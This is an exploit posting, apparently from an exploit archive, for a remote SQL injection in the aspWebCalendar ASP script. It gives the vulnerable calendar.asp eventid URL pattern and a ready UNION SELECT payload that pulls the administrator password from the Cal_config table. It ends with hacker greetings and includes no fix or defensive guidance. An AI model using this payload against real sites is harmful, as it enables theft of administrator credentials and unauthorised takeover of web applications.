******************************************************************************* # Title : aspWebCalendar Remote SQL Injection Vulnerability # Author : parad0x # Contact : :( # D.Page : http://www.scriptdungeon.com/script.php?ScriptID=4306 # $$ : free #S.Page : http://fullrevolution.com ******************************************************************************* http://[target]/[path]/calendar.asp?action=viewevent&eventid=[SQL] Example: /calendar.asp?action=viewevent&eventid=-1%20union%20select%200,Cal_ConfigId,Cal_ConfigAdminPassword,3,4,5,6,7,8,9%20from%20Cal_config """"""""""""""""""""" greetz : VoLqaN, x-MastER,Ekin0x,xoron """"""""""""""""""""" www.p4r4d0x.com